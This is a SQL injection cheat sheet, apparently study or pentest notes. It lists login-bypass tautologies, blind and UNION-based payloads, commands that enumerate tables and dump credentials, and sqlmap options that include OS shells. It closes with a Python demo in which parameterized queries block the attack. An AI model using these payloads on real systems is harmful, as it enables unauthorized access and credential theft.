# SQL Injection

* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)

## Finding an Opportunity

* GET parameter

```sh
http://example.com/index.php?id=' or 1=1 -- -
```

* Sometimes a numeric ID comes first, or the quote has to be closed before the tautology

```sh
http://example.com/index.php?id=10 or 1=1 -- +
http://example.com/index.php?id=10' or '1'='1'-- -
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
```

* Provoke an error to gain information

```sh
http://example.com/index.php?id='
```

* **In case of client-side sanitization, craft the URL instead of using the form!**

## Usage

* Example: terminate the string via `'`, resolve the condition via a tautology, and comment out the rest of the query via `--`

```sql
SELECT * FROM users WHERE username = admin AND password = ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password = ' or 1=1 --+
```

### Boolean True and False

```sql
SELECT * FROM users WHERE username = admin AND password = 1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password = 1' or 1 > 2 --+
```

### Blind injection

Guess characters one at a time, using the true/false response to decide whether the guess was right:

```sh
http://example.com/?id=1' and ascii(substr((select database()),1,1)) < 105 --+
```

```sh
http://example.com/?id=1' and ascii(substr((select database()),1,1)) = 115 --+
```

* `substr(string, start, length)` returns `length` characters starting at position `start` (1-based)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`

### Union based

* __First method:__ increase the `order by` column index until an error occurs

```sql
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
```

* __Second method:__ fuzz NULL values to find the column count, then fuzz the data types
* Check number of cols

```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- # until the error occurs
```

* Check which column is a string

```sql
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```

* Retrieve content (the example pads the remaining columns with NULL and uses a doubled comment `-- //`), or dump the database

```sql
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
```

* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)

### Identify Database

```sh
id=sqlite_version()
id=@@version                        # mysql/mssql
id=(SELECT banner FROM v$version)   # oracle
```

#### SQL Functions

* Use SQL functions to enumerate the tables and columns via UNION ([source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635))
* Extract tables

```sql
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
```

* sqlite specific

```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
```

```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
```

* Extract cols

```sql
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
```

* Data from cols

```sql
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
```

## Tools

### SQLmap

* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
* Use `-r` with a saved HTTP request

```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```

* Detect and test form fields automatically

```sh
sqlmap -u http://example.com/site.php --forms --dump-all
```

|Parameter|Details|
|---|---|
|`-r`|Use an intercepted request saved to a file|
|`--dbms`|DBMS of the target|
|`--dump`|Dump the entire database|
|`--dump-all`|Dump everything|
|`-p`|Testable parameter(s)|
|`--os-shell`|Prompt for an interactive operating system shell|
|`--os-pwn`|Prompt for an OOB shell, Meterpreter or VNC|

### Damn Small SQLi Scanner (DSSS)

* [Script](https://github.com/stamparm/DSSS.git)

```sh
python dsss.py -u "http://example.com/index.php?id="
```

### Online sqlmap

* [Link](https://suip.biz/?act=sqlmap)

## Payloads

* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
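To show why the tautology from the Usage section works and how a parameterized query closes the hole, here is an added example (not from the original page) that runs the same login query both ways against a constructed in-memory SQLite table; the user names, passwords and function names are all made up for the demo.

```python
import sqlite3

# Constructed sample data for the demo; not taken from any real system.
SAMPLE_USERS = [
    (1, "admin", "correct-horse"),
    (2, "alice", "s3cret"),
    (3, "bob", "hunter2"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: user input becomes SQL text.
    With password = "' or 1=1 -- -" the WHERE clause turns into
    username = 'admin' AND password = '' or 1=1 -- -'  (AND binds tighter than OR),
    so every row matches and the trailing quote is commented out."""
    sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the values separately from the SQL,
    so the payload is only ever compared as a literal password string."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    """Returns (rows from vulnerable login, rows from safe login, rows for a real login)."""
    conn = make_db()
    payload = "' or 1=1 -- -"  # the tautology shown in the Usage section
    vuln = login_vulnerable(conn, "admin", payload)
    safe = login_safe(conn, "admin", payload)
    legit = login_safe(conn, "alice", "s3cret")
    return len(vuln), len(safe), len(legit)


if __name__ == "__main__":
    print(demo())  # (3, 0, 1)
```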